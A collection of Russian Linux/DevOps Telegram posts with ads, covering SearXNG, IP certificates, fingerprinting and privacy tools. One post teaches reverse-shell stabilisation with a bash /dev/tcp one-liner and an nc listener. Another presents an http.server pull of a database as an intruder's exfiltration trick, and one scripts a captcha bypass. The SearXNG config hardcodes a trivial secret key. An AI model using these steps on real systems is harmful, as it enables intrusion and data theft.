Bash Days | Linux | DevOps

👩‍💻 Kubernetes отлично масштабируется, а вот управление командами внутри одного кластера — не всегда. Кластеры множатся, YAML копируется, RBAC усложняется, а счета за инфраструктуру растут быстрее, чем нагрузка. 💻 На открытом уроке OTUS: - разберём Kubernetes Multi-Tenancy и практические способы изоляции команд в одном кластере - покажем весь спектр решений — от namespace до виртуальных кластеров. - на реальных примерах разберём Capsule и vCluster, их архитектуру, возможности и ограничения. Вы узнаете: - как дать командам автономию без потери контроля: собственные CRD, операторы, версии Kubernetes — и при этом централизованно управлять квотами, RBAC и сетевыми политиками. - разберём безопасность tenant’ов, Network Policies и Pod Security Standards. - отдельно покажем, где Capsule подходит лучше, а где разумнее использовать vCluster. ⌨️Урок будет полезен platform- и DevOps-инженерам, тимлидам и всем, кто отвечает за масштабируемую Kubernetes-платформу. 📍Встречаемся 4 февраля в 20:00 МСК в преддверии старта курса «Highload Architect». Регистрация открыта: https://vk.cc/cU02Pv Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576

Поднимаем свой поисковик или Fuck The Google! Продолжаем тему приватности. Кто не в курсе, пару недель назад я отказался от гугла и его сервисов, по некоторым причинам, ну и чтобы бороться с зависимостью я активно переезжаю на проверенные opensource решения. ㅤ На этот раз я залез в кроличью нору, отказавшись от поисковиков. Ну как отказавшись, я поднял свой поисковик, который конфиденциально делает запросы в 100500 выбранных тобой поисковиков и агрегирует результаты. Всё это дело в два клика поднимается как self-hosted, отлично работает с проксями и луковичной маршрутизацией. Как говорится — полный фарш. Проект называется: SearXNG. По началу я отнесся к этому решению скептически, но потыкав более вдумчиво мне зашло, зачетная аще штука. Работает быстро, уверенно, выдает релевантную информацию и выглядит очень достойно. Кто бы мог подумать, 25к звезд на гитхабе. Ну и дополнительно, ребята из нижнего мира (те которые блекбоксы проводят) активно пользуются этой штуковиной.

Хотя сейчас большинство давно уже переехали в ИИ и задают поисковые вопросы именно там, но все же иногда рука тянется поискать самостоятельно. Сливать в ИИ теже запросы, тоже такое себе, хотя всем плевать.

Композ файл выглядит так:

services:
  searxng:
    image: searxng/searxng:latest
    container_name: searxng
    restart: unless-stopped
    networks:
      - searxng_net
    ports:
      - "8080:8080"
    volumes:
      - ./searxng:/etc/searxng
    environment:
      - SEARXNG_SECRET_KEY=1234567890
    read_only: true
    tmpfs:
      - /tmp
      - /etc/ssl/certs
    cap_drop:
      - ALL
    cap_add:
      - CHOWN
      - SETGID
      - SETUID
    security_opt:
      - no-new-privileges:true

networks:
  searxng_net:
    driver: bridge

Конфиг ./searchxng/settings.yml:

use_default_settings: true

server:
  bind_address: 0.0.0.0
  port: 8080
  limiter: false
  secret_key: "1234567890"
  public_instance: false

outgoing:
  request_timeout: 3.0
  proxies:
    http: socks5h://user:password@127.0.0.1:9050
    https: socks5h://user:password@127.0.0.1:9050

engines:
  - name: ahmia
    disabled: true
  - name: torch
    disabled: true
  - name: duckduckgo
    disabled: true
  - name: startpage
    disabled: true

Обращаем внимание на SEARXNG_SECRET_KEY и secret_key они должны быть одинаковыми. Остальное интуитивно понятно. Да, еще если не нужна прокся, можешь закомментировать блок proxies, но рекомендую оставить, воткнуть луковицу либо приобрести быстрые socks5, либо поднять свои. Запускаем по классике. Заходим в браузере <IP>:8080 и наслаждаемся. Через морду можно покрутить настройки, которых там жопой ешь. Следом прикручивается домен, SSL, basic auth. И по итогу имеешь свой независимый поисковик, без телеметрии и слежки. Для рядового пользователя это скорее игрушка, но у кого повышенная тревожность вполне зайдёт, тем более с поставленными задачами SearXNG отлично справляется. Из минусов, не все поисковики лояльны, кто-то может запрашивать капчу, но на это есть официальное решение. Я его не пробовал, мне пока достаточно тех что у меня подключены сейчас. И да если думаешь что DuckDuckGo панацея — неа, это компания в мудацкой стране под названием США, которая по первому запросу, сольет про тебя всё что на тебя есть, без зазрения совести. Потому что любая компания в США (CLOUD Act) по запросу суда, должна предоставить такие данные.

Если вы ищете что-то через DuckDuckGo, у компании нет вашего IP + истории запросов, чтобы связать эти запросы с вашей личностью. И поэтому даже если есть официальный запрос от ФБР, DuckDuckGo не сможет передать то, чего не хранит.

Не ведись на такое, это ПИЗДЁШЬ! Всё у них есть, не так много как у гугла, но есть, чтобы тебе смогли подвести писю к носу. Век живи, век учись! 🛠 #security #privacy — 💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

Получаем SSL сертификат на IP адрес. ㅤ Вот и случилось, теперь ты можешь сгенерить валидный SSL сертификат для айпишника. Не самоподписанный, а прям настоящий от Lets Encrypt.

Не путать с mkcert, это совсем другое.

Единственный момент, такой серт будет валиден несколько дней (160 часов), поэтому придется почаще его выпускать, сейчас ставят 5 дней для обновления, как золотую середину. НЕ рекомендуется ставить 6, иначе можешь словить граблю. Вообще acme сам всё в кроне должен прописать, но это не точно. Пока это может делать только acme, все остальные (certbot, angie) совсем скоро к этому придут. Да, для домаших айпишников увы, такая чача не проканает, при попытке получить такой серт, получаем ошибку:

Cannot issue for \"192.168.10.91\": IP address is in a reserved address block: [RFC1918]: Private-Use"

Ну оно и логично, спецификации никто не отменял. Я буду генерить для 178.72.129.181 на котором у меня установлен nginx. Виртуалка прерываемая, так что денег практически не жрет, для тестов в настоящем облаке — милое дело. Приступим: Не забудь подставить своё мыло, а то меня спамом завалит и я буду материться на кота.

curl https://get.acme.sh | sh -s email=shubkin@bashdayz.ru

Конфигурируем default в nginx:

server {
    listen 80 default_server;
    listen [::]:80 default_server;

    server_name _;

    location ~ ^/.well-known/(acme-challenge|pki-validation)/ {
        add_header Content-Type text/plain;
        root /var/www/letsencrypt;
    }

    location / {
        return 301 https://$host$request_uri;
    }
}

Создаем структуру папок и релоадим:

mkdir -p /var/www/letsencrypt
mkdir -p /etc/nginx/ssl
nginx -t
nginx -s reload

Выписываем пиздюлей сертификат:

acme.sh --issue --server letsencrypt -d 178.72.129.181 -w /var/www/letsencrypt --certificate-profile shortlived --days 3

Отлично, сертификат получили, устанавливаем:

acme.sh --install-cert -d 178.72.129.181 --key-file /etc/nginx/ssl/ip.key --fullchain-file /etc/nginx/ssl/ip.crt --ca-file /etc/nginx/ssl/ip.ca.crt --reloadcmd "systemctl restart nginx"

Добавляем дополнительный блок в default в nginx:

server {
    listen 443 ssl default_server;
    listen [::]:443 ssl default_server;
    server_name _;
    return 403;
    ssl_certificate /etc/nginx/ssl/ip.crt;
    ssl_certificate_key /etc/nginx/ssl/ip.key;
}

Перезапускаем:

nginx -t
nginx -s reload

И радуемся, теперь у тебя есть валидный SSL на голом айпишнике:

Общее имя (ЦС)  YE1
Организация  Let's Encrypt
Дата выдачи: 29 января 2026 г.
Срок действия: 5 февраля 2026 г.

Дело в шляпе, что сказать? Пиздато! Порой ОЧЕНЬ не хочется привязывать домен, чтобы обзавестись SSL сертификатом, теперь выход есть. Глядишь найдется хак, чтобы сгенерить подобное для 192.168.0.1, но наверное это из оперы моих влажных фантазий. 🛠 #linux #devops #ssl — 💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

Здрасти приехали! Томить не буду — SelectOS теперь в реестре российского ПО Минцифры. А это значит, что теперь не нужно оправдываться, что твой прод работает на «не совсем отечественном» ПО. Ставишь SelectOS, запускаешь проекты и спишь спокойно. А если возникло техническое недопонимание — вендор решит твою проблему. Прям сказка какая-то! Что в коробке: - Бесплатный старт → SLA при росте - 500+ проверенных конфигураций - Расширенная документация - Обновления без сюрпризов Скачать и протестировать самому — лучший аргумент. 🦖 Качни бесплатно и потыкай: https://slc.tl/ugelq

Так же я писал серию постов про эту ОС, было разжевано большинство нюансов. Ознакомиться с полным «старт-паком» можешь по этим ссылкам: - Пробуем SelectOS - SelectOS в деле - Ставим SelectOS в облако Реклама. ООО "Селектел-Лаб". erid:2W5zFG1ryvQ

Как быстро скачать файл с сервера ㅤ Бывает ситуация, когда тебе нужно быстренько дернуть какой-то файл с сервера, но там нет ни nginx ни т.п. херни. Вспоминать синтаксис scp и ебаться с ключами тоже не хочется. Тем более для такой задачи ставить софт — ну такое себе. Из ситуации можно выйти проще.

Этот способ в основном используют спец-люди, которые в результате blackbox вектора проникли на север и им нужно утащить жирненькую базу данных. Всё элементарно.

Заходим в любую папку с файлами и запускаем:

python -m http.server 2977

Если питон старый, потрёпанный и сморщенный как хуй, делаем так:

python -m SimpleHTTPServer 2977

Затем курлим файл и скачиваем его к себе на машину:

curl -O http://linuxfactory.ru:2977/bashdays_db.zip

А можем прям в браузере открыть URL и увидеть список всех файлов, кликаем мышкой и скачиваем необходимое. Еще бывают случаи когда curl не установлен, но wget есть из коробки:

wget -O bashdays_db.zip http://linuxfactory.ru:2977/bashdays_db.zip

Ну и в конце, когда получил желаемое, не забывай остановить такой веб-сервер. Изучай! 🛠 #security #linux #tricks — 💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

🚀 Закрывается набор на курс «Инфраструктура высоконагруженных систем» в OTUS Если вы хотите наконец-то выйти на уверенный senior/lead уровень в инфраструктуре, строить системы под миллионы пользователей и перестать бояться настоящего highload — сейчас самый последний момент. Группа стартует 30 января, набор закрывается в ближайшие дни. Успейте пройти вступительное тестирование, подтвердить уровень и забронировать место по спеццене 🎯 Что даёт курс: Самый востребованный highload-стек 2025–2026: - Terraform → Pacemaker + Corosync → Nginx/HAProxy под миллион RPS → Kubernetes (очень глубоко) → OpenStack → Ceph → SaltStack → Puppet → MySQL/PostgreSQL Cluster → Kafka → Elasticsearch - Реальные enterprise-практики, которые каждый день держат сверхбольшие системы: актив-актив кластеры, автоматический фейловер, распределённые хранилища, инфраструктура как код на стероидах, нагрузочное тестирование - Финальный проект с защитой: вы с нуля строите отказоустойчивый highload-кластер с мониторингом, алертингом, бэкапами и автоматическим восстановлением — сразу в портфолио и в резюме Наставники — действующие архитекторы сверхбольших инфраструктур. Удобный формат: онлайн-занятия 2 раза в неделю по 1,5 часа вечером, записи навсегда, активный чат группы, код-ревью и помощь по всем ДЗ 👉Пройдите тест прямо сейчас и забронируйте место, пока группа не закрыта: https://vk.cc/cTLVSi Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576, www.otus.ru

Как тебя вычисляют по шрифтам Гугловский пробив по кукисам это классика, но это не единственный механизм сопоставления. Сегодня рассмотрим browser fingerprint (fonts). ㅤ Пробежимся по кукисам. Практически на каждом сайте, установлен анальный-зонд с маркировками: Google Analytics, Google Ads, YouTube embed, reCAPTCHA и т.п. То есть страница сайта подгружает внешние скрипты и код с доменов гугла. Когда ты заходишь на такой сайт, браузер отправляет кукисы в гугол, в них будет информация: твой id (у тебя будет один и тот же для разных сайтов), с какого сайта ты пришел, ip, браузер, время, язык, локация и т.п. Короче в эту клоаку уходит максимальное количество данных, которое можно от тебя получить. Ну а дальше тебе подсовывают рекламу — ага, этот чёрт читал про «ипотеку», давай заскамим его таргетированными предложениями про ипотеку.

Если ты залогинен в гугле и гуляешь в этом же браузере по другим сайтам — гугл это знает. Мало того, при любом звоночке, он без раздумий передаст эту информацию «малдерам». Звучит как сказка, но у гугла есть статистика сколько они слили данных по таким запросам. И да, когда ты с закрытыми глазами принимал «лицензионное соглашение», в нём все это оговаривалось.

Что же такое fonts fingerprint? Это как тест ДНК, который даёт до 99% совпадения. Шрифт это как паспорт. У каждого пользователя свой, уникальный набор шрифтов. Даже если ты отключишь кукисы, у гугла есть другие инструменты для слежки: разрешение экранов, шрифты, webgl, canvas, timezone, ip + поведение. Кстати «режим инкогнито» не спасёт, это — миф. В этом режиме браузер не сохраняет историю, не сохраняет кукисы после закрытия. ВСЁ! Куки это верхушка айсберга, все остальные методы скрыты под капотом.

Fingerprint это корреляция десятков сигналов во времени.

Как работает классический font fingerprint: Я подготовил страничку, в ней содержится как раз такой детект по шрифтам и канвасу. Открой её в браузере, а потом открой в «инкогнито» и ты сильно удивишься. Шрифты и хеш канваса будут идентичные. Даже если открыть страницу в другом браузере, Canvas Hash в большинстве случаев будет идентичен. Для чистоты эксперимента, открой страничку в ТОR браузере и ты увидишь, что набор шрифтов поменялся, да и canvas hash протух. Идея метода: берем текст, рисуем его с базовым шрифтом (serif / sans-serif), тестируемым шрифтом + fallback, сравниваем размеры, если размеры изменились — шрифт установлен в системе. И по итогу мы имеем паспорт пользователя: шрифты = ОС + язык + софт. Шрифты меняются редко, уникальность очень высокая, не ломаются при включении VPN / Инкогнито.

fonts + canvas + webgl ≈ уникальность > 99%

А чё делать? Использовать разные браузеры под разные задачи. Один браузер чисто для гугла (но рекомендую вообще снести учетку и сделать чисто под ютуб), второй для сёрфинга, третий для просмотра порнушки. На рынке много антидетект браузеров, один из лидеров это LibreWolf. Этот браузер (Firefox на стероидах приватности) подсовывает одинаковый виртуальный набор, ломает измерения, возвращает одинаковые размеры, добавляешь шум.

Отключает webgl fingerprint, режет canvas, нормализует timezone, screen size, locale, отключает webrtc leak, блокирует third-party cookies, выключает телеметрию Mozilla, ломает high-entropy сигналы, всегда врёт одинаково.

LibreWolf не делает «рандом», он делает массовую «одинаковость». То есть условно у 100 пользователей, которые пользуются этим браузером, будут идентичные данные. А среди 100 таких пользователей, тебя сложно идентифицировать — ты одинаковый. Чем больше уникальности, тем легче тебя узнать. Но ты всё равно спалишься, если залогинишься в гугле, либо будешь использовать этот браузер под разные задачи в рамках одной сессии. Чтобы скрыться, одного браузера мало, приватность это комплексная мера. По мере моей лени, буду накидывать подобные темы и снимать с тебя розовые очки. Ну а ты пока переваривай весь этот пиздец. Дальше затрем за Cloudflare и его приколы. 🛠 #security #privacy — 💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

🗣Внимание, конкурс! Разыгрываем 7 ваучеров на обучение и сертификацию со скидкой 100% от The Linux Foundation, а также 7 доступов к видеокурсу Kubernetes: База от Slurm. 🟣 Каталог электронных курсов и сертификации Ваучеры можно применить к любому: — онлайн-курсу — сертификационному экзамену (CKA, CKS, CKAD и другие — в комплекте!) — или пакету (курс + сертификация) 🟣 Курс Kubernetes: База от Slurm. Условия розыгрыша просты: 🔵 Подпишитесь на KazDevOps и жми кнопку "Учавствую!" под оригинальным постом в канале KazDevOps. 🚩 29 января подведем итоги и выберем 7 победителей. Каждый победитель получит ваучер + доступ к курсу от Slurm. Активировать ваучеры нужно до 07.01.2027. После этого у вас будет 1 год и 2 попытки, чтобы завершить обучение и сдать экзамен. Go-go-go, и успехов! @DevOpsKaz 😛

Многих эта тема обошла стороной, дело привычки берет своё. ㅤ Я про docker-compose.yaml. Так вот, в современных дистрибутивах не обязательно называть так файл, достаточно обозвать его compose.yaml и всё будет работать. Но при условии если у тебя не допотопная ОС со старой версией docker’a. Современный docker давно перешел на compose.yaml.

docker-compose — это отдельный python-инструмент docker compose — встроенный плагин docker cli

Теперь docker в приоритете ищет файл compose.yaml и только потом старый docker-compose.yaml. И так и так все будет работать. Оно пока на это не ругается, но рано или поздно к этому придут. Наверное ты уже замечал, что если в yaml указать version: 3.9 оно скажет — ты ебанутый? Я пожалуй это проигнорирую. Это нужно было указывать раньше, чтобы docker понимал какие поля разрешены и как вообще интерпретировать файл. Теперь это легаси и docker автоматически определяет версию, чтобы избавиться от зоопарка версий: v2, v2, v3.7, v3.9. Получаем один формат → одна логика → меньше гемора.

Кстати аналогичная хуйня в кубере, где версию апихи указываешь в манифестах. Если ты не знаешь как с этим работать, будет тебе боль и страдания. За эту тему поговорим отдельно.

Но опять же если у тебя древняя ОС, выбора особо не будет, придется прописывать версии и поддерживать это наследие. Пример с version или подстава. Создавалась это не для docker compose, а для docker swarm. В version:3 Docker Compose просто молча игнорировал: mem_limit, cpu_shares, cpus, restart_policy, depends_on. Не было ни ошибок, ни предупреждений. Просто ничего не происходило. Контейнер запускался, но не как ожидалось.

version: "3"
mem_limit: 512m

Хм… 512 говоришь, хуй те! Эй OOM давай к нам, у нас тут пациент! version:3 — Swarm-спека Ну и про yaml и yml пару строк. Можно писать так и так, оба варианта равноправны. Но всё же рекомендуется yaml, потому что это полное официальное расширение, так пишется в спецификациях и документациях. Плюсом это единый стиль Kubernetes, GitHub Actions, Helm и т.п. На сколько помню yml пошел со старых систем, когда было ограничение в 3 символа, опять же наследие прошлого. Возможно ошибаюсь, поправьте в комментах. 🛠 #docker #linux #devops — 💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

💥 Percona XtraDB Cluster: создаём базу данных, которая не падает 27 января в 19:00 мск — бесплатный вебинар курса “Инфраструктура высоконагруженных систем” Превратите вашу MySQL-инфраструктуру в мощный и отказоустойчивый кластер. 📌 Что будет: — Ключевые архитектурные отличия PXC от стандартной MySQL-репликации — Сборка с нуля живого кластера с синхронной репликацией, готового к продакшену — Обсуждение ограничений PXC для избежания подводных камней 🎯 После вебинара вы сможете: — Настраивать и запускать собственный кластер Percona XtraDB Cluster — Правильно выбирать между кластером и репликацией для разных задач — Понимать принципы синхронной репликации и механизма консенсуса в PXC Особенно полезно системным администраторам и администраторам баз данных (DBA), которые хотят построить отказоустойчивую и масштабируемую инфраструктуру и перестать дежурить по ночам из-за падающих баз. Регистрация: https://vk.cc/cTDQuz Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576

Интимность данных Как мы знаем, любая операционная система что-то куда-то шлет, шпионит, собирает данные. Потом этими данными начинают жонглировать всякие мастодонты вроде гуглахлама, мягкософта, аппла и т.п. ㅤ В лучшем случае тебе покажут таргетированную рекламу, в худшем сольют по первому звоночку всю твою подноготную всяким секрет малдерам и фибиэрам. И узнаешь ты это не сразу, а спустя 2-3 года, а возможно и не узнаешь.

Как говорил мой знакомый — да кому мы нужны, все наши данные давно уже гуляют по сети. Но когда он узнал, что гугол взял его учетку (со всем содержимым и метаданными) и просто отдал третьим лицам на изучение — начинаешь задумываться, причем становится по настоящему жутковато.

Возможно кто-то из вас получал подобные письма (Google received and responded to a legal process issued by the…) и знает это ощущение безысходности. Да, похоже на фейк (2018 года) и фишинг, но увы всё по настоящему. Поищи в сети если интересно, много таких случаев как оказалось. Ебала рыба озеро! 😲 Лишь только по этим причинам я полностью выпилился из гугла и его сервисов. Про этот большой пиздец-переезд я запилю отдельный пост, было очень познавательно и увлекательно, особенно со смартфоном. Ладно, теперь по теме поста. Сегодня речь про Privacy Sexy. Кроссплатформенная забияка, с открытым git репозиторием и возможностью установить на машину как отдельное приложение либо использовать через веб.

Этот проект помогает включать/отключать privacy и security настройки в Windows / macOS / Linux с помощью готовых «твиков» и скриптов.

Ты просто выбираешь нужные галочки, а справа получаешь готовые скрипты, которые нужно запустить. Да, под Linux и Mac это будут именно Bash скрипты. Это отличная возможность посмотреть в кишочки и забрать какие-то идеи в свои проекты. Что внутри: - Больше 5 сотен скриптов/настроек, которые уменьшают телеметрию, отключают лишние сервисы, усиливают безопасность и приватность. - Есть графическое приложение (desktop) и веб-версия. - Всё прозрачно — видно, что именно делает каждый твик/скрипт. - Обратимость — можно откатить изменения (revert). - Полный open-source, лицензия AGPL-3.0. Важно и ценно — в отличие от рандомных «батников» из интернета, privacy.sexy показывает, какие именно изменения будут сделаны и генерирует скрипты прозрачно. Пользуйся на здоровье, это лучше всяких бинарных твиков!

Ну и не храни на гугол драйве своё хоум-видео с пылесос-отсосом, неровен час сам станешь звездой такого эпизода на которую однажды будут дрочить малдеры с дикого запада.

🛠 #security #privacy — 💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

Стабилизация реверс-шелла Во время создания реверс шелла, управлять этим шеллом прям больно, привычные терминальные команды работают неадекватно. Сейчас покажу, как пентестеры приводят такой шелл к нормальному виду. ㅤ Для начала на своей машине запускаем:

nc -lvnp 2288

Этой командой мы откроем порт 2288 на прослушивание, будем ждать входящее соединение. IP этой машины у меня 192.168.10.24. Теперь на подопытной машине запускаем:

/bin/bash -i >& /dev/tcp/192.168.10.24/2288 0>&1

Возвращаемся на свою машину и видим, что коннект произошел:

root@n8n:~# nc -lvnp 2288
Listening on 0.0.0.0 2288
Connection received on 192.168.10.31 47504
root@onlyoffice:~#

Отлично. Пробуем нажать CTRL+L, для очистки экрана. Ага, хуй там плавал, видим только, что выводятся управляемые символы L^, аналогично не получится нажать CTRL+C и т.п. Стабилизируем shell

script /dev/null -c /bin/bash

Отправляем консоль в бекграунд, нажимаем CTRL+Z

root@onlyoffice:~# ^Z
[1]+  Stopped                 nc -lvnp 2288

Возвращаемся:

stty raw -echo; fg

Нажимаем: ENTER

export TERM=xterm

На этом всё! Теперь наш реверс-шелл полностью стабилен, можем пользоваться им в своё удовольствие, все привычные команды и сочетания работают отлично, артефакты не лезут. Вроде мелочь, но в своё время кровушки многим попило, да чё юлить, сейчас молодежь которая встала на путь поиска уязвимостей с этим постоянно сталкивается. И что интересно на курсах про «стабилизацию шелла» никогда не рассказывают. Вот такие пироги, изучай. Больше про реверс-шеллы, можешь почитать тут: - Практикуем reverse-shells - Генератор reverse-shells 🛠 #security #linux — 💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

Хорошего DevOps-инженера непросто найти, трудно недооценить и ещё сложнее — заменить. Спрос на специалистов превышает предложение, а зарплаты — в числе самых высоких в IT. Если хотите развиваться в профессии с высоким потенциалом, начните с курса Нетологии «DevOps-инженер с нуля». Что освоите за время обучения: 👉 Docker, Kubernetes, Jenkins, Git и ispmanager; 👉 настройку CI/CD и мониторинг инфраструктуры; 👉 администрирование Linux и работу с облачными технологиями; 👉 микросервисную архитектуру и отказоустойчивые кластеры. В программе — минимум 4 проекта, бесплатный доступ к Yandex Cloud, 3 месяца практики в ispmanager и приоритет при отборе на вакансии партнёра. Плюс 10 живых встреч с экспертами из Alibaba Group, VK и Ozon — сможете спросить всё, что волнует о профессии. Сейчас на курс действует скидка 40% — записывайтесь💡 Реклама. ООО “Нетология” ОГРН 1207700135884 Erid: 2VSb5yHnnp1

Часть 2. Рассказ о том, как я похудел со 130 до 85 килограмм.

Первая часть здесь

🔤🔤🔤🔤🔤🔤🔤 Ну, и теперь просто несколько личных фактов про похудение: * При очень быстром похудении может быть холодно. Падает температура тела (у меня по утрам была 35). Это не хорошо. Влияет на жизнедеятельность бактерий внутри. * Если не есть овощи/фрукты и йогурт/кефир могут возникнуть проблемы с пищеварением. * Некоторые фрукты с "вяжущим" вкусом лучше исключить на время снижения веса. Например незрелые груши, айва, хурма. * Морковь нужно есть со столовой ложкой растительного масла. (желательно чуть отварить или протушить) * Если хочется чая/кофе, то на самом деле мозг требует сахара. Попробуйте выпить чай/кофе/воду пару раз без сахара, и желание что-нибудь выпить быстро пропадет. * Если съесть/выпить сладкое - есть хочется значительно сильнее, чем раньше. * Если вышел из-за стола с чувством, что наелся - значит переел. * Оглянитесь, есть ли в вашем окружении "пушеры" (люди которые предлагают/подбивают съесть лишнего или ненужного). Минимизируйте общение с ними. * Взвешиваться нужно каждое утро. В одно и то же время. Я взвешиваюсь перед завтраком. В это время вес минимальный за сутки :-) * Некоторые китайские весы запоминают последний вес. И если новый отличается от старого меньше чем +/- 300 гр - показывают предыдущий (типа очень точные. Хреновы маркетологи). Решается взвешиваем другого веса или взвешиванием после ужина (без учета результата). * Разница в весе между вечером и утром может быть 1 кг (вода и углекислый газ) * Вес может меняться +/- 1кг в течении месяца в зависимости от фазы луны. И это не приливы. * При длительном (более 6 месяцев)стабильном весе съесть можно все: торт, пирожки, конфеты, шашлык, но однократно, и с ежедневным контролем веса. * Если съесть соленое/кислое или арбуз - вес утром может быть +2-3 кг. Но это проходит за два-три дня. Если не проходит - нужно провести ретроспективный анализ и устранить причину. * При стабильном весе балансировка веса - ужином. На 200гр воды (одна, две (норма) или три столовые ложки с горкой) овсянки c яблоком/бананом на воде. * Завтрак в 6:30 второй завтрак в 10:40 (только стакан киселя) обед 13:30 ужин в 17:00. * Снижать вес трудно. Поддерживать - нет. * Беговая дорожка каждый день в 20:00 (быстрый шаг 5.5-6.5 км/ч 20-30 мин с разминкой и заминкой) уменьшает и калории и чувство голода. * сон 22:00. ㅤ Побочные эффекты: * Летом - сильная экономия на дезодорантах и порошке для стирки. * Штаны не протираются между ног. Каблуки в обуви не проваливаются. * Придется полностью сменить гардероб. Я сменил не только рубашки/брюки но и обувь!!! * На пятый этаж можно подняться даже не сбив дыхание. * Походы к вертеброневрологу не нужны. Всем здоровья. 🛠 #рабочиебудни — 💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

Tagd Tagd продолжает делиться с нами своими ИТ хаками, тем более после январских праздников у многих кость знатно расширилась. Благо у меня глисты и мне это «наверное» не грозит, но ты почитай, глядишь сгодиться. Поехали!

Часть 1. Рассказ о том, как я похудел со 130 до 85 килограмм. ㅤ Видимо я был очень жирным. Пришлось разбить на две части. :-) Это первая часть. Вторая часть здесь. ИТ - работа с активной умственной работой и отсутствием физической активности. Мозгу нужна глюкоза. Дозировать ее сложно, и поэтому физическое развитие идет в ширину. Оглянитесь - среди айтишников с опытом практически отсутствуют атлеты. Я был такой же. Жирный-мирный. Два раза в год ходил к вертеброневрологу править позвоночник и задыхался при подъеме на третий этаж.

Лицензионное соглашение. Я никого ни к чему не призываю, ничего не рекомендую, ни за что не отвечаю. Просто рассказываю о себе.

Однажды я встретил знакомого, который постройнел. Он сказал, что просто перестал есть хлеб и сладкое и через месяц у него не стало живота. Это послужило триггером, и я решил попробовать.

Похудение - не диета. Это изменение образа жизни!!! Тут все просто, как в арифметике - есть потребляемые калории, есть расходуемые. Чтобы худеть — нужно меньше жрать калорий.

Я худел в несколько этапов. 1. Отказался от мучных и сладких изделий. 2. Отказался от газированных напитков и соков. 3. Заменил колбасу/сосиски на курятину/индюшатину/рыбу (но не соленую и не консервы). 4. Меняем сливочное масло → сыр → творог. Сметана → кефир. 5. Исключил картофель, добавил в рацион больше каши (гречка, пшеничка, перловка, овсянка). Все без сливочного масла, но с овощами. 6. Уменьшил порции (просто купил маленькую пиалу, и решил, что еда в ней должна быть «без горки». 7. Чай/кофе с одной ложкой сахара можно только 3 раза в день (завтрак/обед/ужин). В остальное время вода. Можно теплая/горячая. 8. Жареное лучше заменить на вареное/тушеное. 9. Увеличил количество овощей и фруктов в рационе. ⭐️ Прядок не важен (кроме последнего) - Применили один пункт - Подождали, Продолжили. 👆 Если Вы что-то убираете из рациона - добавьте овощи или фрукты. И Это НАВСЕГДА!!! Я худел в несколько этапов. На первом этапе снизил вес со 130 до 105. Потом полка. Привыкал к новому весу. Затем снизил до 95. И опять полка. Сначала я худел по 10 кг за месяц. И это было неправильно. Меня шатало, настроение было очень плохим, упали когнитивные способности. Правильный темп похудения - 3-4% текущей массы тела в месяц. Раз в неделю один завтрак | обед | ужин можно есть - что захочется (я ел мороженное). Но только раз в неделю и только один прием пищи, с соблюдением правила пиялки. Потом с 95 до 83. Сегодня у меня ~85. Всем Здоровья! 🛠 #рабочиебудни — 💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

Встречайте новый формат инженерного диалога T-Sync Conf — офлайн-конференция от Группы «Т-Технологии» для опытных инженеров. 7 февраля в Москве на площадке TAU соберутся платформенные, security- и дата-инженеры, аналитики, DevOps-, SRE-, CI/CD-, AI-, ML-, R&D- и DX -специалисты. Как все устроено: — Контуры — тематические зоны, каждая из которых раскрывает отдельный слой инженерной реальности: AI, Data, R&D, Security, Platform и другие направления. — Вместо классических докладов — круглые столы, стенды, хакатон, воркшопы и мастер-классы. — Инженерные решения изнутри — возможность посмотреть, как устроены технологии в Т-Банке и других компаниях, и пообщаться напрямую с теми, кто их создает. А еще много практики, интересных знакомств и живых систем. Успейте подать заявку

Я тут это, капчу накрутил. Создавал под один нищенский нишевый проект. 😲 Сможешь пройти? ㅤ Подсказываю — можно накидать bash скрипт, который будет эмулировать нажатие F24 и успешно пройти эту проверку через передачу кейкода в xdotool. Ну либо клавиатуру купить как на картинке. Концепт на Bash:

for i in $(seq 1 50); do
  xdotool key F24
  sleep 1
done

Всем хорошей рабочей недели! 🛠 #security #feature #dev — 💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

В хромо подобных браузерах в «Режиме разработчика» есть интересный инструмент, называется «Sensors». Про это очень мало кто знает, поэтому я принес это тебе. ㅤ Суть вкладки — можно задать любую геолокацию. По итогу сайты, которые это отслеживают мягко говорю прихуеют. В Sensors можно поменять не только геолокацию (можно свою в пресетах накрутить), но и еще всякие штуки включить — ориентация, тачи а не клики, логическое число CPU. Короче инструмент подменяет реальные значения на кастомные. Например, заходишь на сайт, разрешаешь пробив геолокации и сайт видит тебя, что ты вообще — самурай с японской локализацией браузера. Очень полезно для тестирования приложений, как распределяются воркеры, как работает распараллеливание, обман fingerprinting и т.п.

Мы раньше применяли эту фичу для аналитики фишинговых страниц, которые не честно собирали данные про пользователей и отправляли в бигдату с целью дальнейшей обработки.

Ну и плюсом, для тех кто не знал — на вкладке «Network» есть выпадающий список «Trottling», в нем ты можешь выбрать качество интернет соединения, либо задать своё. Ну и посмотреть как будет вести себя сайт например при скорости в 2G. Вот такие пироги, изучай! 🛠 #services #feature #dev — 💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

Ну началось… ㅤ Нашел я тебе тут новейший браузер для терминала. Причем не огрызок ебаный вроде lynx, а прям полноценный, с поддержкой графики, скриптов и со всеми современными технологиями. Называется это чудо Brow6el, из пакетов ты его не поставишь, потому что разрабатывает его гикнутый профессор, соответственно тебе придется собрать его самому из исходников. Благо товарищ побеспокоился об ущербных и дал нам Bash скрипты для билда. Поехали собирать:

git clone https://codeberg.org/janantos/brow6el.git

sudo apt install build-essential cmake gitlibsixel-dev libgtk-3-dev libx11-dev libxrandr-dev libxinerama-dev libxcursor-dev libxi-dev libglib2.0-dev

cd /tmp/brow6el
chmod +x download_cef.sh
./download_cef.sh

mkdir -p build
cd build
cmake ..
make -j$(nproc)

Готово! Теперь запускаем:

cd build
./run_brow6el.sh https://linuxfactory.ru

